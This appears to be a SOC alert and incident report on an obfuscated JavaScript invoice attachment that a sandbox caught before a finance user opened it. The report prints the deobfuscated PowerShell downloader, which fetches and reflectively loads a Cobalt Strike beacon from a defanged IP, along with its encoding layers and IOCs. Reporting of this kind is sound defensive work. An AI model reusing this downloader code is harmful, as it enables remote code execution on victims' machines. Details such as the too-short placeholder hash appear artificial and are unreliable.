FortiSandbox Alert Details
Alert ID: FORTI-OBFUSCATED-1027-7842 Alert Time: 2024-02-19 11:30:22 EST Severity: HIGH (88/100) Source: Fortinet FortiSandbox Rule: “Obfuscated JavaScript Detected – Potential Malware Downloader” MITRE ATT&CK: T1027.002 – Obfuscated Files or Information: Software Packing
Alert Details:
File Analysis Report:
File Name: invoice_7842.js
File Size: 124 KB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to user in Finance
Submission Time: 11:15 EST
Obfuscation Analysis:
File is heavily obfuscated JavaScript
Multiple layers of encoding:
Layer 1: Base64 encoded (detected)
Layer 2: XOR with key 0x42 (detected)
Layer 3: ROT13 (detected)
Layer 4: GZIP compressed (detected)
Layer 5: Final PowerShell script
Deobfuscated Content:
$wc = New-Object System.Net.WebClient
$payload = $wc.DownloadData(‘http://185.143.221[.]89/beacon.bin’)
$assembly = [System.Reflection.Assembly]::Load($payload)
$entryPoint = $assembly.EntryPoint
$entryPoint.Invoke($null, (, [string[]] (”,)))
Sandbox Behavior:
When executed, downloads Cobalt Strike beacon
Beacon connects to 185.143.221[.]89:443
Injects into legitimate process
Establishes persistence via scheduled task
Threat Score: 10/10 (Malicious)
Obfuscation: 10/10
Network Behavior: 10/10
Persistence: 8/10
Overall: 10/10 (Critical)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify FortiSandbox analysis
FortiSandbox Console
Confirmed heavily obfuscated malicious JavaScript
2. Email Investigation
Find email with attachment
Proofpoint, Exchange
Email to finance@company.com from spoofed vendor
3. Quarantine Email
Block and remove email
Proofpoint
Email quarantined from all mailboxes
4. User Check
Verify if user executed file
CrowdStrike
User did not open attachment (alert before execution)
5. IOC Distribution
Block URLs and IPs
Palo Alto, Cisco Umbrella
URLs and IPs added to blocklists
6. Threat Hunting
Check for similar files
FortiSandbox, Splunk
No other occurrences found
Jira Incident Report
Ticket: SOC-2024-098 Summary: T1027 – Obfuscated JavaScript Malware Downloader in Email Status: RESOLVED Resolution: MALICIOUS – Blocked Before Execution Priority: P2 – MEDIUM Labels: T1027, obfuscated-files, javascript, fortisandbox, phishing Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Obfuscated JavaScript Detected – Potential Malware Downloader”.
File: invoice_7842.js (email attachment).
Target: Finance Department.
Time: 2024-02-19 11:30 EST.
Technique: MITRE ATT&CK T1027.002 – Obfuscated Files or Information: Software Packing.
2. Technical Analysis:
Attack Chain:
11:10 – Email sent from “vendor@payment-update[.]net”
11:11 – Email delivered to finance@company.com
11:12 – FortiSandbox analyzes attachment (inline)
11:15 – Analysis begins
11:25 – Deobfuscation complete
11:28 – Malicious behavior confirmed
11:30 – Alert triggers
11:31 – Email quarantined (before user opened)
Obfuscation Layers:
Layer 1: Base64 encoding (conceals initial content)
Layer 2: XOR with key 0x42 (adds simple encryption)
Layer 3: ROT13 substitution (common obfuscation)
Layer 4: GZIP compression (hides patterns)
Layer 5: Final PowerShell downloader (payload)
Final Payload:
Downloads beacon.bin from 185.143.221[.]89
Loads as .NET assembly
Executes entry point (Cobalt Strike)
Connects to C2 on port 443
Email Details:
Sender: vendor@payment-update[.]net
Subject: “Invoice #7842 – Overdue Payment”
Attachment: invoice_7842.js (masquerading as PDF)
3. Investigation Findings:
Timeline:
11:10 – Email sent
11:11 – Email delivered
11:12-11:28 – FortiSandbox analysis
11:30 – Alert triggers
11:31 – Email quarantined
11:32 – SOC investigates
11:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– invoice_7842.js (SHA256: a1b2c3d4…)
Network:
– Download URL: http://185.143.221[.]89/beacon.bin
– C2: 185.143.221[.]89:443
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842 – Overdue Payment”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked URLs and IPs at firewall and proxy.
Added file hash to blocklists.
User Notification:
Finance team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block .js attachments.
Enhanced filtering for invoice-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending obfuscated malware via email.
Contributing Factors:
JavaScript attachments allowed (now blocked).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
Financial Impact: None.
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all JavaScript attachments via email gateway.
Enabled FortiSandbox inline analysis for all emails.
Created alert for any obfuscated files.
8. Conclusion:
A sophisticated obfuscated JavaScript malware was delivered via email to the Finance department. FortiSandbox deobfuscated the multi-layer file, identified it as a Cobalt Strike downloader, and triggered an alert before the user could open it. No compromise occurred.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 12:30 EST